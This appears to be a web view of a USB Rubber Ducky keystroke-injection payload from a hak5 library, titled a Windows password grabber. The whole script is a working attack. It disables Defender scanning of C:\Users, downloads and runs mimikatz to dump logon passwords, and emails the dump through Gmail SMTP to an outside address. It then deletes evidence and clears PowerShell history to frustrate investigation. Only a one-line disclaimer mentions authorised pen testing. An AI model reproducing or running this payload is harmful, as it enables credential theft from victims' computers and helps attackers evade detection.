Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/Simple_User_Password_Grabber/payload.txt
2968 views
1
REM Title: windows password grabber
2
REM Arthor makozort, https://github.com/makozort
3
REM Target: windows 10 (with admin access), might work with windows 7 idk
4
REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NOT LIABLE FOR ANY MISUSE OF THIS SCRIPT
5
REM --------------set default delay based on targets computer speed, 350 is around mid range (I think)
6
DEFAULT_DELAY 350
7
REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
8
DELAY 1000
9
REM ------------open powershell as admin and set an exclusion path in the C:\Users path
10
GUI r
11
STRING powershell
12
CTRL-SHIFT ENTER
13
DELAY 600
14
ALT y
15
STRING Set-MpPreference -ExclusionPath C:\Users
16
ENTER
17
STRING exit
18
ENTER
19
REM -------------download mimikatz
20
GUI r
21
STRING cmd
22
CTRL-SHIFT ENTER
23
DELAY 600
24
ALT y
25
STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
26
ENTER
27
REM ------------run the following mimikatz commands and print results in new txt file
28
DELAY 4000
29
STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
30
ENTER
31
STRING privilege::debug
32
ENTER
33
STRING sekurlsa::logonPasswords full
34
ENTER
35
STRING exit
36
ENTER
37
REM< --------- delete mimikatz
38
STRING del %TEMP%\pw.exe
39
ENTER
40
STRING exit
41
ENTER
42
REM -------------email the pwlog.txt to your email
43
GUI r
44
STRING powershell
45
CTRL-SHIFT ENTER
46
DELAY 600
47
ALT y
48
STRING Remove-MpPreference -ExclusionPath C:\Users
49
ENTER
50
STRING $SMTPServer = 'smtp.gmail.com'
51
ENTER
52
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
53
ENTER
54
STRING $SMTPInfo.EnableSsl = $true
55
ENTER
56
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
57
SHIFT 2
58
STRING gmail.com', 'PASSWORDHERE');
59
ENTER
60
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
61
ENTER
62
STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
63
SHIFT 2
64
STRING gmail.com'
65
ENTER
66
STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
67
SHIFT 2
68
STRING gmail.com')
69
ENTER
70
STRING $ReportEmail.Subject = 'Hello from the ducky'
71
ENTER
72
STRING $ReportEmail.Body = 'Attached is your duck report.'
73
ENTER
74
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
75
ENTER
76
STRING $SMTPInfo.Send($ReportEmail)
77
ENTER
78
DELAY 4000
79
STRING exit
80
ENTER
81
REM ------cleanup time
82
GUI r
83
STRING powershell
84
CTRL-SHIFT ENTER
85
DELAY 600
86
ALT y
87
REM ----------delete the txt file
88
STRING del c:\pwlog.txt
89
ENTER
90
REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations
91
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
92
ENTER
93
STRING exit
94
ENTER
95
REM ------lock the pc
96
GUI l
97
98